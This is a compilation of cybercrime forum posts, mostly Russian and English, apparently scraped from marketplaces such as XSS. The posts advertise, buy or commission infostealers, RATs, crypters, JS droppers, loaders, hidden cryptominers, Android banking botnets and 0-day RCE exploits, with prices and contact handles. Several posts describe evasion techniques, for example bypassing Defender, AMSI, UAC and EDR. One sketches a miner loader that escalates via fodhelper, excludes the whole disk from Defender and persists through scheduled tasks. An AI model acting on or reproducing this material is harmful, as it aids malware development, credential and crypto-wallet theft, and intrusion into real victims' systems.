Looking for Lodash RCE for Nginx, Apache
know vulnerability
CVE-2021-23337
,
CVE-2020-8203
This offer provides a full-chain 0-day exploit targeting Palo Alto Firewalls, enabling Remote Code Execution (RCE) with proof-of-concept (POC) developed in Golang.
Tox: AD78A7E0863EAFC7E9DD93526FDADDC6601DE694C2185B829501B184F7DBEB5A2190B0B45DC1
BIN = 12k, Step = 1k$, Blitz = 15K
!ESCROW IS A MUST NO ESCROW NO PURCHASE!
"fees are from buyer's"
Ищу человека со сниффером. От меня доступы PrestaShop, Magento. Работа исключительно за %.
Spoiler: Закрыто на депозит. 3000$.
RidgeBot is a fully automated AI-based technology that assesses and identifies vulnerabilities not only in websites but also in systems and networks, etc. It uses advanced hacking tools and technologies to exploit critical vulnerabilities within the system. Do you want to optimize your time and hack websites and other servers and networks with just a few clicks? You need RidgeBot!
Features:
Automatic vulnerability discovery and exploitation
Five layers of attack information:
- Attacker: RidgeBot
- Target: Target URL or IP
- Attack surface: open door found
- Vulnerability: vulnerability details with target information.
- Risk: how the vulnerability is used to attack the target system
Comprehensive vulnerability details
Show details for each vulnerability, including:
- Type of vulnerability
- Severity classification
- CVSS score/vector
- Description
- Fix solution
- Reference information.
- Details: payload etc.
- Attack snapshot
Explore vulnerability to validate your existence.
- Remote Command Execution
- Credentials hack
- Sensitive information hack
- Database Hack
Shows that the database was hacked by weak password or SQL injection
And much more...
Comes with a video tutorial and pdf file with step-by-step instructions for installation.
Price: $1.000
DM Here or on TG: @Desnake_USA
Привет, Meta и Redline были закрыты в результате недавних операций. Есть ли альтернативное программное обеспечение, которое я могу разместить на том же сервере с той же системой? Мне нужно что-то с хорошим временем выполнения. В последнее время я не получаю высокую производительность от Lumma; кажется, что уровень отклонений низкий, и не проводятся тесты на определённых устройствах.
Есть ли стабильные альтернативы, работающие как Meta или Redline, или что вы используете и что можете порекомендовать?
Гарант!
предложения в тг: @CyberDedxx
i buy binder and spoofer and pay well.
blackshadow6060@protonmail.com
TG: @watchout123
Продам лицензию на стилер Redline (lifetime до 30 года).
Гарант +
В комплект входят креды log:pass и сама панель последней версии. Также могу
дать советы по настройке и крипту.
Уже давно не работаю в этой сфере, панель лежит без дела. Официальная цена 600
USD
Если тема открыта - актаульно
Куплю готовое решение, дорого!
Доброго времени суток.
Хотел поинтересоваться, какие есть ратники нормальные в данное время, и где их
можно купить, если нужно будет? Все что нашел, это два сайта с покупкой crax
rat, причем один из продавцов был скамер. Находил церберус и 888rat - но не
уверен в их актуальности. Как таковых больше не знаю.
Есть смысл делать на продажу макросы но с доставкой через .rar?
Note that even though the inside of protected zip files is being scanned by mail security, Phantom js dropper is guaranteed to bypass majority of mail scanners (excluding honeypot email servers, i.e email servers hosted by Google, Microsoft, and other popular email spamtraps
Features:
FUD LPE (UAC Admin privilege escalation) tested successfully on 32bit & 64bit
PC
fileless execution for all encrypted powershell commands
(Optional) Decoy pdf file (or any file u want) will be first executed to
deceive the target, then your payload will be executed in the background
Bypass Windows Defender
Long-lasting FUD. When you spread correctly, file can remain FUD after
continuously spreading to business emails for more than a week
Bypass WD machine learning Behavior detection
Each js file is completely unique
Runtime FUD
Bypass AMSI
Scantime FUD
target is WD however most AV are bypassed
(Optional) feature to disable windows defender notification (only in the UAC
version)
double layer obfuscation for phantom js build which helps it last longer and
more difficult to reverse by threat researchers.
Stubborn WD detection bypassed:
Wacatac detection (All variants)
Bearfoos detection (All variants)
Behavior detection (All variants)
Sabisk detection (All variants)
JS dropper Price:
6 unique builds - Only encrypted Javascript no UAC - $150
6 unique builds - encrypted Javascript + UAC (32bit & 64bit) - $350
_Both js variants are not the same they have different functions & behavior
Phantom Js + UAC variant does not drop any malware directly on disk which makes it more powerful. All it does is create defender exclusion & create persistence for your file using the url u send me. So once exclusion & persistence is enabled your file must execute with admin rights no matter what
reFUD (of same file): $40
reFUD available on request
Send me dm telegram @WERFAULT
TOS:
We
are not responsible for how you use this product. This product is available
for educational purposes only
It
is forbidden to send Phantom js dropper to email servers known to be spam
traps. Only business emails recommended to spread
Phantom js dropper must be spread to only business email with business domains
& free from spam traps (if you want your file to stay FUD for long)
Phantom js dropper must NEVER be downloaded directly through browser (it must
be password protected in zip file). Because it is heavily obfuscated js file,
browser may flag the file even when it's FUD
It
is recommended to use a spam trap remover tool to remove bad (spam trap)
emails & NEVER spread Phantom js dropper to those bad emails
It
is forbidden to upload phantom js file to (free & public) file hosting
services
Highly recommended to host phantom js file only on Apache self hosting with
your own vps
Paid customers will provide their decoy file & a direct link to their payload,
then get their unique js file build
Highly recommend to spread phantom js inside a protected zip file for high
click rate
As a bonus to customers, if you have purchased phantom js dropper twice, on your third & subsequent purchase you will get 10 unique builds instead of 6.
I'm interested in purchasing an fud .lnk loader for my crypted fud .exe file or .vbs with .pdf and corresponding icon the file must be completely fud and give no warnings.
Написан на с++, WinApi, зависимости полностью отключены, "чистая сборка".
- Получаем привилегии NT AUTHORITY SYSTEM.
- Программа далее выполняет следующее:
- Проверка и настройка привилегий пользователя.
- Управление безопасностью объектов Windows, таких как реестр, файлы и
службы.
- Работа с SID (идентификаторы безопасности пользователей и групп).
- Манипуляции с дескрипторами безопасности объектов (DACL/ACL).
- Восстановление настроек безопасности объектов "убираем следы"
- Чтение, запись, удаление и откат/восстановление значений в реестре.
- Логирует текущие настройки безопасности объекта и изменяет их (DACL/ACL).
- Создание группы, предоставление доступа простой группе с обычными правами к
указаной системной папке, подпапкам, файлам с Full правами: чтение, запись,
изменение, выполнение
- Восстанавливает настройки безопасности обьекта: папка/файл, реестр,
сервис/служба
- Удаление группы из списка доступа "убираем следы"
- Управление доступом к файлам, ключам реестра или службе.
- Настройка доступа к объектам для конкретного пользователя.
- Работа с правами и доступом на уровне пользователей.
- Проверено на серверах.
- Полностью чистый.
- Исходный код 86 кб.
- Вес eхе без логгирования 31 кб.
- Цена 100 к
[!] - Связь через личку.
[!] - Гарант
видео:
Spoiler: закрыто на депозит
Erbium Stealer
Топовый, многофункциональный стилер с кучей фишек.
Давно искали качественный стилер ? Вы его нашли.
Spoiler: Наши преимущества
Стилер не имеет зависимостей и может запускаться без сторонних файлов
Возможность отправки логов в Telegram с полной кастомизацией сообщения (вы
сможете выбрать то, что вы хотите получать)
Возможность запускать ваш файл после сбора логов (2 метода запуска Drop & Run
и Shellcode)
Возможность скачивать все логи в 1 клик
Анти-СНГ [On/Off]
Лог создается в памяти и не хранится на ПК
Spoiler: Сбор стилера
Скриншот рабочего стола со всех мониторов
Информация о ПК (CPU, GPU, DISK, RAM, кол-во мониторов, кол-во ядер
процессора, разрешения монитора, разрешение мониторов, MAC, версия Windows,
владелец Windows, имя ПК, архитектура ПК, ключ лицензии Windows)
Пароли, [tooltip=154]куки[/tooltip], история, карты, авто-заполнение с
большинства популярных браузеров на базах Gecko и Chromium
Холодные кошельки с браузеров (MetaMask, TronLink, Binance Chain Wallet,
Yoroi, Nifty Wallet, Math Wallet, Coinbase Wallet, Guarda, EQUAL Wallet, Jaxx
Liberty, BitApp Wallet, iWallet, Wombat, MEW CX, GuildWallet, Saturn Wallet,
[tooltip=596]Ronin[/tooltip] Wallet, NeoLine, Clover Wallet, Liquality Wallet,
Terra Station, Keplr, Sollet, Auro Wallet, Polymesh Wallet, ICONex, Nabox
Wallet, KHC, Temple, TezBox, Cyano Wallet, Byone, OneKey, LeafWallet,
DAppPlay, BitClip, Steem Keychain, Nash Extension, Hycon Lite Client, ZilPay,
Coin98 Wallet, Harmony, KardiaChain, Rabby, Phantom, TON Crystal Wallet)
Прочие плагины браузеров (Authenticator, Authy, Trezor Password Manager, GAuth
Authenticator, EOS Authenticator)
Steam (список аккаунтов + файлы авторизации)
Discord (токены)
Telegram (файлы авторизации)
Холодные десктоп кошельки (Exodus, Atomic, Armory, Bitecoin-Core, Bytecoin, Dash-Core, Electrum, Electron, Coinomi, Ethereum, Litecoin-Core, Monero-Core, Zcash, Jaxx)
Spoiler: Скриншоты
Spoiler: Цены
1 Месяц - $100
Навсегда - $1000
Spoiler: Оферта
Запрещено загружать ПО на сайты, которые сливают файл (по типу VirusTotal)
Запрещено наносить ущерб/мешать работе ПО и сайта в том числе любыми методами
(Слив, Reverse, Dump, DDoS и т.п)
Продавец имеет право отказать вам в покупке на свое усмотрение
При обнаружении ошибки/недочета/бага/уязвимости, Вы обязаны сообщить об этом
технической поддержке ПО. За использование ошибок/недочетов/бага/уязвимости в
корыстных целях вы будете заблокированы без возможности подачи аппеляции.
Продавец не несёт ответственность за покупки лицензионных ключей, совершенные
не у официальных продавцов/официальном сайте продукта.
Продавец не несет ответственность за ваши действия. ПО созданно исключительно
в образовательных/ознакомительных целях.
Продавец не занимается распространением/продажей вредоносного ПО. Только
продажа лицензионных ключей для доступа и ознакомления с ПО.
Регистрируясь на сайте/используя данное ПО, Вы автоматически соглашаетесь с
этими правилами.
Правила могут быть обновлены в любой момент без оповещения пользователя об
этом.
За нарушение любого из этих правил лицензия будет аннулирована.
Незнание правил не освобождает от ответственности.
Spoiler: Контакты
Новостной канал - https://t.me/erbium_news
Техническая поддержка - https://t.me/erbium_support
Бот для автопокупки - https://t.me/erbium_stealer_bot
Согласен на гаранта за счет покупателя.
Тема исключительно для отзывов
Other boards:
https://zelenka[.]guru/threads/4135155/
https://***********/threads/erbium-stealer-native.3016/
Need to carry out a cyberattack on the website.
Need to promptly carry out an attack on the website and post a photo on the homepage that I will send. Where can I turn to for help? Recommend forums or people, any information will be important, thank you. First contact in private messages.
Продам исходники неризидентного лоадера + панель, возможность билда в
zip,msi,exe. Нуждается в EV подписи для обхода смарт скрина.
После покупки можете открывать свой сервис и продавать. Скрины панели
прикрепляю ниже. В крипте не нуждается.
Билд билдиться руками и вяжется к панели(нажать 2 кнопки и заменить 2 текста).
После продажи настрою все и покажу как установить сбилдить и тд, решение под
google ads, bing и тд.
Цена за всё: 10 000$ скидка до 8000$, продажа в 1 руки. Если скидка большая
прошу доплату за показ настройки.
Имеется поддержка загрузки белого софта, msi installerов и тд. Панель скрины и
тд на тест в пм, прошлая тема: https://xss.is/threads/119464/.
Output форматы и вес:
Поддержка форматов и множества действий:
Панель написана на php, лодер java.
Панель ставиться на ubuntu server с nginx, считай на любой дедик.
Имеется
Hello Everyone
This is Very Simple Tool Undetected
It Gives You Payload Payload.MSC Full Fud
Very Simple To Use
Telegram:@MONSTERMC
We are a call center team of 7 elite members with excellent skills to bring
quality logs
Looking to cooperate with someone who has their own solutions : Stealer ,
Resever Proxy , Webinject...
Contact TG for discussion more
anoteam@exploit.im
Spoiler: Closed on deposit
FUD Crypter runtime and Scantime
DM
![t.me](/proxy.php?image=https%3A%2F%2Fcdn5.cdn- telegram.org%2Ffile%2FpldWkzTiPviPS5xnJxQj5k_MGtD841oFCYF4Ht1omxxcDGapHTCzyuLrIL4hcjWbLGcbfWax2JvmaF6YPDwCwdFaDTw5olf_cLDjEXTMQeaSvDBoUgdXfazqsNoh3ojMmp8oSA4Z8bEwiFZ00lWw0dMyAxwBHcpdYRB8K6sGqcM_kXMURDbWtTbVNutjzweRe_m8d5sz00uA85V1norl_pPNuxoT3cYmVRfxhWWZIJIIeln4g7MsC4f07h9AQJCj4kz0D7YeOR148kjjxTEPZzEDAFwE1dy4MQBm- tAyFT8EHq_7bqxiQG- qhGnM_b9MNY2Coh5m4owL8nk7mtlufA.jpg&hash=0104b25704444e953f96014de4e2400c&return_error=1)
✨✨ Borderline personality Disorder ✨✨
t.me
Неактуально
Hi,
We are looking for someone to gain remote access to our targets computer.
Target uses Windows 11.
We are only looking for skilled people who can use 0day exploits. Do not expect target to take any action ( ie. opening a pdf or word document ). Target will not take pishing bait.
Only contact if you understand how to use 0day exploits and have access to it.
Tg @tellmetellme69
We will work only thru Escrow.
Scammers do not waist our time.
РУ
Пишите ваши предложение как его можно сделать или купить, и реальная цена его.
ENG
Write your suggestions how it can be made or bought, and the real price of it.
Hello, XSS Friends
I need simple rat source code(written in c++).
Function:
in server side, can input powershell or cmd command line. in client side,
excuting the command line and sending the result to the server.
Server can manage multi clients stably.
Write pm first.
Всех приветствую. Готов приобрести хороший хвнц для моей команды, под win/mac, рассмотрю предложения специалистов. Интересует либо написание под нас, либо приватный хороший вариант с арендой/покупкой. Рассмотрю предложения только от специалистов, толкнуть туфту и перепродать мне софт не получится, даже не тратьте своё время те, кто в этом не шарит или посредит.
Так же рассмотрю опытного трафера в команду под процент или на фикс.зп, есть проблемы(не можем пройти модерации), нужен траф на Стиллер и собственно на хвнц, который ищу. Все предложения жду в ЛС или в телеграм @sazam_san1
Im selling Unique and Handmade Crypts for your Malware
Your will get:
- In-Memory Code execution
- Randomized Behavior for Evasion
- A really secure payload Handling (Loads and decrypts embedded resources
that contain sensitive code or payloads)
- Efficent Thread Management
- Persistance
- File Hide
Working for all Major Rats, Stealers etc.
Results:
https://www.virscan.org/report/c68c813df...6af9b2d553
https://kleenscan.com/scan_result/2aacb5...2dc9f0f69e
Recent:
![avcheck.net](/proxy.php?image=https%3A%2F%2Favcheck.net%2Fimg%2Flogo- blue.png&hash=cee6508989b328cffbfe9596440db6c7&return_error=1) avcheck.net
Options:
Custom Icon
Custom Assembly Information
Digital Signature
Price is only $70.00 USD / Per build
PM or Jabber
soft for flash usdt (exodus wallet)
tg @ usdt_trust_wal
要求是能够加密有效负载并绕过 360° 防病毒软件。
Does anyone know where I can find a RAT that blacks out the clients screen while I work ? And don't mention any of the clearweb solutions like anydesk or teamviewer as they don't work for what I am trying to do.
hello
looking for Windows RAT to be used in corp networks
needs to take screenshots, manage files, execute cmd, stiller and and HVNC
budget $10k/month or %
no public offerings please they have all been tested
qTox in pm
i have a really good opportunity for someone who has access to a rat/crypto wallet stealer that works with phantom wallet.
tox: B64479EEEDD25183443C1A5A53E60CC0576B2203A75E32BE76E94A26B429E02B6C625A99CC05
Версия: 6.5.30
Как это работает?
Создание эксплоита в данном продукте разделено на 2 этапа для универсальности.
Плагины Code Generation генерируют непосредственно код который будет
исполняться при запуске эксплоита, а Launcher плагины содержат непосредственно
сами генераторы файлов/эксплоитов. Чтобы собрать эксплоит нужно чтобы Launcher
и Code плагины были совместимыми. Тип Code плагина отображается в описании
(Text output/Binary output). К примеру Binary плагины выдают на выходе
бинарный код который непосредственно исполняется процессором, тогда как Text
плагины выдают скрипты или любое другое текстовое представление кода. Launcher
плагины могут принимать на вход как бинарный так и текстовой ввод
(Text/Binary). Также есть плагины (Builder) которые не принимают кодовый
плагин (для них нужно выбрать None в списке кодовых плагинов). Этот тип
плагинов не принимает никакого ввода (к примеру внедряет в себя EXE файл или
содержит ссылку URL). Тип Launcher плагинов также указан в описании.
Для примера возьмем гипотетическую уязвимость переполнения стека. Launcher
плагин генерирует именно файл который создает условия для возникновения
переполнения (к примеру в структуре файла есть поле с большой строкой) и
подготавливает окружение для исполнения внешнего бинарного кода (выделение
X-страниц/смена атрибутов защиты существующих) и передает управление коду
который генерирует Code плагин с бинарным выхлопом. Подготовка необходима т.к.
уязвимость может требовать определенных условий (как пример хранение кода в
строке, но нулевые байты запрещены). Code плагин уже непосредственно выполняет
полезную работу.
Существуют несколько типов служебных лаунчеров. Null transform - просто
сохраняет выхлоп Code плагина как есть (удобно анализировать настройки и
т.п.). PE File Generator - генерация exe/dll файлов - можно в отладчике
непосредственно анализировать выхлоп бинарного плагина.
Примеры создания готовых эксплоитов можно увидеть на канале https://www.youtube.com/@trilliumsoftware2819
Как приобрести лицензию?
I need to set up an FTP server to get the direct download link of the file. I will pay the wages.
@myphuong13579
Spoiler: Закрыто на депозит
Написан на Objective-C. Вес билда 57кб.
Сейчас ворует хром куки и пароли (делает декрипт) и exodus wallet. Панель 1
для всех.
Ссылку на скачку билда могу делать без Chrome алерта.
Если проект кого-то интересует буду делать дальше обновления добавлять
брузеры, кошельки и т.д.
Пока цена символическая 30$.
Spoiler: Скрины
**_Automatic exe encryption app lifetime license. Автоматический криптер exe лайфтайм, с исходниками стаба.
Questions? - Go to pm. Вопросы в пм.
Каждый раз разные ключи для билда и имена ресурсов.
Распакованный шелкод бублика может палиться по эвристике если будете его юзать для своих целей.
Language of the app native / ЯП c++.
Price to this: 600$, who buy first 650$. Первым 550$.
Included conversion exe to shellcode conversion by modified donut, shellcode fud on avcheck and no runtime donut detects like DonutMarteB and other shit.
This app can be used for stealers,rats,botnets, beacons, cobalt strike.
This app supports x86, x64.
AV Evasion: unhooking, virtual checking, sandbox checking, prevent debug, names check, check dlls and etc.
Running payload methods: ShellCode, RunPE, DotNet run via memory / RunPE, LoadPE_
When it got detects u need pay for it be cleaned, stub sources be in your hands.
Поддержка предоставляется за дополнительную плату если полезли детекты.
For support and clean will need pay.
Auto building,cleaning, new build unique than other.
Stub system payload will be encrypted,compressed, than it be in resources.
I help setup all, u can give me vps and I show how use.
Demonstration evasions:**
Spoiler: SS
App functions
Example build exe with integrated modified donut 3rd ss - Shellcode of
modifed donut:
Spoiler: SS + pseudo sample
Всех приветствую, хочу предоставить вам свой продукт.
Простой лоадер с небольшим функционалом.
Функции:
- Получение/Обновление Скриншота экрана
- Загрузка на ПК .exe программ, и запуск в скрытом режиме
- Самоуничтожение
- Возможность выполнять функции сразу для всех ботов
[ Client - Rust lang ]
[ Server/Panel - Python ]
Аренда - 100$/мес - 350$/Навсегда
Поддержка 24/7
Хороший отстук ботов, билд работает на 32х/64x
Продаю строго через гаранта этого форума!
Для покупки пишите на форуме или в TG - @magic_jorj
После покупки вы получаете билд и сервер
Вес - 1mb
Установка/Поддержка бесплатная
Hello.
I Want to buy CVE-2024-38077 (Windows Remote Desktop Licensing Service).
Note: The Public PoC (that, has gone offline from the web is not working something is missing. Check it on all Windows servers.
Python:Copy to clipboard
connect_to_license_server(target_ip) # 建立连接
heap_base = leak_addr() # 泄漏dll基地址,2025成功
Need:
Working Version on the Windows Server
Payment:
How to deal:
Хочу купить исходный код Windows RAT.
Бюджет: договорная
Предпочтительный язык: C/C++
работаю через гаранта форума
PM
English :
Looking to buy windows RAT source code.
Budget is: negotiable
Preferred language : C/C++
Working through forum guarantor.
P.M.
Нужен софт по типу хвнц на адроид и Винду в одной панели с возможностью
группировать.
по техничке хотелось бы видеть там
Режим призрака для остановки дисплея
Кейлоггер
Программа чтения с экрана для обхода черного экрана банковских или
криптографических приложений.
Логирование и отсылку сообщений Whatsapp.
Удалить/Загрузить файлы/Папку
Читать СМС
Отправь СМС
История звонков
Менеджер по контактам
Файловый менеджер
Отключить приложения.
Можно сделать из исходников анубиса или Пегаса (если есть).
Людям без портфолио не беспокоить. Работа только через гарант с первого цента!
Ищу человека который напишет стиллер с нуля. Бюджет хороший
Android - SEED PHRASE Finder
!Продам исходный код вируса для Android, который сканирует сохранённые
изображения в галерее пользователя с целью поиска seed-фраз по ключевым словам
и шаблонам.
(Optical Character Recognition, OCR)
Код написан на Java с использованием Groovy DSL для конфигурации сборки (build.gradle).
Лог отправляется в виде изображения, на котором был обнаружен определённый
шаблон seed-фразы, либо если на изображении найдено ключевое слово, например:
" Seed", "Phrase", "Mnemonic", "Recovery" и т. д.
Код фильтрует некорректные данные, сверяя их с официальным словарём seed-фраз из 2048 слов (BIP-39).
Продукт работает в фоне как background service до окончания сканирования галереи.
Detects (__FUD ):
Пример лога вTelegram :
! После покупки вы получите полный исходный код продукта, готовый к
использованию.
!Гарант: XSS/EXPLOIT
Хочу попробовать себя в этом направлении, есть может какие-то тимы, либо проверенный человек который под % даст?
Привет ребята, я ищу реальных кодеров, которые разрабатывают банковский вирус
для андроид, ботнет для андроид от имени нескольких игорных компаний в
Малайзии.
Я могу предложить не менее 50k рекламных акций и не менее 1000 загрузок в день
(у меня 3 seo сайта, и несколько игорных брендов), и если ваши инструменты
работают хорошо и отвечают нашим потребностям, я могу даже предложить
100k-250k$ денег на разработку в качестве инвестиций (я буду очень осторожен с
партнером, которого я выберу для инвестиций) и, конечно, мы, преступный
синдикат, приветствуем кодеров, чтобы связаться в любое время! Я, пожалуйста,
свяжитесь со мной с вашей гордостью работ, я принесу вам рынок в Китае,
Малайзии, Сингапуре, Тайване, Гонконге, европейских странах и дать вам
удовлетворительное сотрудничество %. Это мой счет, и я приветствую вас, чтобы
связаться со мной: https://t.me/TTjkfuckufkfkfkufk.
В любом случае, мне нужны реальные контрактные партнеры, чтобы присоединиться
к этому преступному синдикату, и мы все авоевать этот рынок。
Hi guys, I am looking for real coders who develop android banking virus,
android botnet on behalf of multiple gambling companies in Malaysia.
I can offer no less than 50,000 online promotions and no less than 1,000
downloads per day (I have 3 seo sites, and multiple gambling brands), and I
can even offer 100K-250K$ of development capital as an investment if your tool
works well and meets our needs (I will be very careful with my choice of
partner for the investment) and of course, we, the crime syndicate, welcome
coders anytime! Contact me, please contact me with your proud works, I will
bring you the market in China, Malaysia, Singapore, Taiwan, Hong Kong,
European countries and give you a satisfactory cooperation %. This is my
account and I welcome you to contact me: https://t.me/TTjkfuckufkfkfkufk
Anyway, I need real contractual partners to join this crime syndicate and we
all conquer this market.
I would welcome people with real ability to contact me, there is a lack of such service in the market, I once worked with someone with outstanding ability but soon, he disappeared, I would like the person to have good communication skills and contractual spirit, in any case, I would like to be contacted by such outstanding people.
Of course, the conditions of cooperation are not fixed, your tools and our market determine the criteria for real cooperation
Аккаунт полный безлимит, АПИ ворк.
Гарант форума+
Hello,
The dropper execute through Windows registry in hidden and without any CMD screen or pop-up, always execution no error no lag no bug..
1- Dropper execute inside all windows versions, 32bit or 64bit.
2- Size under 15Kb without encryption
3-Bypass WD & Cloud by default
4- Silent, no pop-up no CMD screen...
5- Bypass UAC (direct execution)
6- The Dropper can be linked to TG Bot and sends Instant notifications on
Execution, such as system IP/Country/Time/.. .more
7- Easy to encrypt!
With the source code I provide you my own engine encryption tool + 10 private stubs which will be used to fully FUD the dropper bin, each stub resist up to 5 days, even more.
I'm ready to show you the work in action
Price: 2.3k only 3 slots open!
![avcheck.net](/proxy.php?image=https%3A%2F%2Favcheck.net%2Fimg%2Flogo- blue.png&hash=cee6508989b328cffbfe9596440db6c7&return_error=1) avcheck.net
![kleenscan.com](/proxy.php?image=https%3A%2F%2Fkleenscan.com%2Fimages%2Flogo- mini.png&hash=f0087456dc8cef90f219c8e9607b4c84&return_error=1)
](https://kleenscan.com/scan_result/0c62bf332113fc04a677484291b0116b4abd88d814b70b127adc3fd52f668711)
Analyze files to detect malware. Analyze URLs, domains, and IPs to detect malware and blacklist status.
kleenscan.com
TOX :
6F13AE7E4DBB39A9B2E028D62ACFDC3C8A2C12232DAB4785455457C1BBED350C023602CFB716
(Faster communication)
Jabber1:Darkmatter@jabb.im
Jabber2 : Darkmatter1@thesecure.biz
js dropper to deliver payload without smartscreen
price per build: 15$
contact: @nullptrfield
pm also if any question!
give a test to 5 person for FREE
0/5
Нужен стиллер но прям хороший. Пишите в лс форума
Я продам образец, у него есть возможность отключать законные службы Windows.
!! ТОЛЬКО ДЛЯ WINDOWS
Interested buyers reach-out first lucky customers to get 50% off
#AMSI #AVKILL
I have a budget of 4000$ per month looking for android botnet
contact me for more information.only accept escrow.
Продам исходники c++20 расшифровки хрома(любой хромиум форк можно добавить, но вероятнее потребуется изменять конфигурацию в исходниках). Реализовано 2 способа, один приоритетный требующий админ права создает процесс и расшифровывает ключ в контексте system, второй не требующий админ прав работает через инжект шеллкода. Из внешних зависимостей sqlite3 и json парсер. Как бонус есть отдельный проект в котором реализован небольшой движок для удобного написания шеллкодов(удобный вызов любых апи функций, обфускация строк и т.д)
Цена 2.000$
На гаранта согласен.
"Нерезидентный лоадер" написан на Python, обфускация Pyarmor, собран Pyinstaller'ом.
PoC загрузки и закрепления в системе xmrig майнера:
В теории, можно загружать таким образом любую малварь, т.к. у xmrig 50/70 детектов на virustotal, но лоадер успешно обходит WD.
Механизм работы:
1. Эскалация до админа с помощью fodhelper
(Без прав админа невозможно закрепиться в с системе или добавить исключения в
дефендер)
2. Добавление в исключения дефендера всего диска
3. Xmrig скачивается с гитхаба и распаковывается
4. Закрепление в системе с помощью планировщика задач
Майнер настроил так, что при активности пользователя, он перестает майнить --pause-on-active=10 (после 10 секунд неактива начинает майнить), а также другие настройки, слегка уменьшающие утилизацию процессора, но сохраняя комфорт для пользователя.
Также, можно скрыть сам майнер под названием какого-нибудь легитимного процесса, убрать дефолтный .ico, распаковать в System32 (админ права позволяют) и т.д.
В теории, самым удобным способом доставки будет powershell команда для загрузки и запуска, т.к. права админа лоадер сам получает и таким образом можно не париться о смартскрине. Либо можно склеить с любым приложением, но будет смартскрин.
Looking for somesome to teach me how to use Brute Ratel
Cobalt Strike for basic stuff not to much I will tell you what I need it for I
will be tipping you for this
Looking for a sniffer for a site I got access.
PM me and quote your price.
New 0days up for sale, working with serious buyers through escrow service only:
(Control-WebPanel [CWP]) - Preauth RCE to root - Asking price : $150,000
fofa link:
https://en.fofa.info/result?qbase64...mJiBwcm9kdWN0PSJDV1AtVmlydHVhbC1Ib3N0LUNQIg==
- around 600K instances
(Uniview DVR OS) - Preauth RCE to root - Asking price: $80,000
Zoomeye: https://www.zoomeye.org/searchResult?q="cgi-bin%2Fmain-cgi" 1.7Mil devices
(Raisecom Router OS) - Preauth RCE to root - Asking price: $45,000
- Zoomeye: https://www.zoomeye.org/searchResult?q="" 197K devices
All of them are newly developed and tested and has not been sold yet.
We also have a few other 0days that we don't want to sell, for these we are looking for partners who want to collaborate on the targets.
PM for further details / POCs. Potential deals will be done only through the forum's escrow service for reliable exchange.
ДАЛЕЕ ПРЕДПОЛАГАЕТСЯ ЧТО ВЫ БУДЕТЕ ИСПОЛЬЗОВАТЬ СКРЫТЫЙ МАЙНЕР ДЛЯ ИСКЛЮЧИТЕЛЬНО ПОЛЕЗНЫХ ОБЩЕСТВУ ЦЕЛЕЙ :
Я не несу ответственность за причиненный ущерб тем или иным способом всех продуктов данной темы, если Вы нарушили хоть одно из выше перечисленных правил.
Hidden Miner:
Язык: C++/ASM без зависимостей.
Вес: 2МБ
Возможность использования вместе с клиппером.
Инжект шеллкода майнера в EXPLORER.EXE
Опционное скрытие работы при проявлении активности пользователя.
Нужно для того что юзер меньше замечал неладного.
Спустя 10 секунд от последней активности - майнинг продолжится.
Удаленное управление через прямую ссылку с изменяемым вами текстом, до Бесконечного числа возможных ссылок используемых в билде.
Использование 2 и более ссылок упереждает блокировку тех или иных ресурсов,
так что билд не останется без контроля.
В билд зашиваются статичные настройки, так что даже при потере доступа ко всем вашим ссылкам - майнинг продолжится по заранее указанным данным.
Снятие процессов приложений используемых для реверса и автологгирования, на основе сигнатурного анализа файла.
Изменение названия файла/расположения не влияет на эту функцию.
Автозагрузка по запросу, билд предполагает криптовку.
Шифрование всех строк билда, расшифровка при запуске.
Логгирование в Телеграмм по запросу.
Хороший Runtime и Static детект.
30 алгоритмов для майнинга
В данный момент был протестирован майнинг XMR в долгую на CPU. Майнинг на GPU в данный момент не поддерживается.
Clipper из данной темы: https://xss.is/threads/111524/#post-880428
Стоимость:
На все дополнительные вопросы отвечу по контактам ниже.
Связь:
Looking to buy 0day exploits for a variety of products. Ranging from $30k-$500k+ depending on details.
Windows LPE 0day - $100k-$150k
VPNs / Firewalls (Cisco, Palo Alto, etc.) - $50k-100k+
Enterprise Device Management Software - $50k-100k+
Other products will be considered case by case.
Payment in BTC/XMR. All deals will use the on-site escrow system.
Also if you are a skilled security researcher and can demonstrate it, please msg me. I can provide work for you with great compensation.
Message me on Tox:
28BC4D2774C45C219A65D74A7166104AFC9E58B3EEEBDDC349D59DAC03D5826109075FB6F504
Or DM on the site.
Всем привет, на форуме (да и в целом в сфере) не так давно, но успел
поработать с парой команд (последний месяц нахожусь в основном в свободном
плавание). Работал на регистрации банковских акков (и автоматизации процесса),
но последнее время это направление стало сложнее и не так прибыльно. Не так
давно потребовалось зарегать EV сертификат для одной из фулок. Процесс занял
немного больше времени, чем я планировал, но все прошло успешно. Когда начал
погружаться в тему, понял, что это довольно востребовано и прибыльно. Вопрос:
1. Действительно ли на EV сертификаты такой спрос и за какую сумму вы готовы
были бы его приобрести?
2. Готов ли кто нибудь проспонсировать данное направление в контесте
расходников. Мне не нужны деньги вперед, но нужны фулки, рисовалы, трастовые
домены и тд. Возможно кому то из вас покажется это интересным и перспективным,
особенно для работы в команде
PS
На данный момент есть 2 сертификата, которые готов выставить на продажу (цену
предлагайте). Еще 3 находятся на рассмотрении, вполне вероятно 1-2 точно
получат одобрение. Хотелось бы продолжить дальше, так как считаю что у меня
неплохо получается
Кому интересно и есть конкретные предложения по развитию контакт в ПМ
Hey everyone.
I am looking for someone to be able to mentor me and teach me how to set up RAT infrastructure .
I would like to learn the following subjects:
For sure I missed some subjects, but this is the overall idea.
Доброго дня суток
Готов купить рабочую и актуальную LPE под 2024 год.
Контакт в пм
Доброго времени суток, форумчане. Предлагаю Вашему вниманию услуги
криптования.
Криптую формата EXE (x86/x64), DLL (x86/x64), Shellcode (CS,
badger brute ratel)
Загрузчик написан на С++ (+200кб min), фацл запускается из памяти и не
дропается на диск без зависимости
Обходим все возможные АВ и топовые EDR (S1, Cortex XDR, Symantec
Endpoint, Sophos Endpoint, Trellix XDR)
Smart Screen и Google alerts не обходит
Имеются собственные стенды и приватный чекер
Работаю со времен распада СФРЮ, уникальный опыт проверенный годами, хочется
тряхнуть стариной поработать с интересными индивидами.
CONTACTS
jabber:brainentropy0 (собачка) exploit (точка) im
tox:
957C8F89C669C9847E7417F4A424669FD132CCE194AB7B2EE5BD4B3D21AD8E37BB69EB301D36
telegram: brainentropy0 (https://t.me/brainentropy0)
У кого можно взять андроид рат/бота в аренду за % от профита? Команда
трафферов и отработчиков есть
Пусть даже будет хук но допиленный
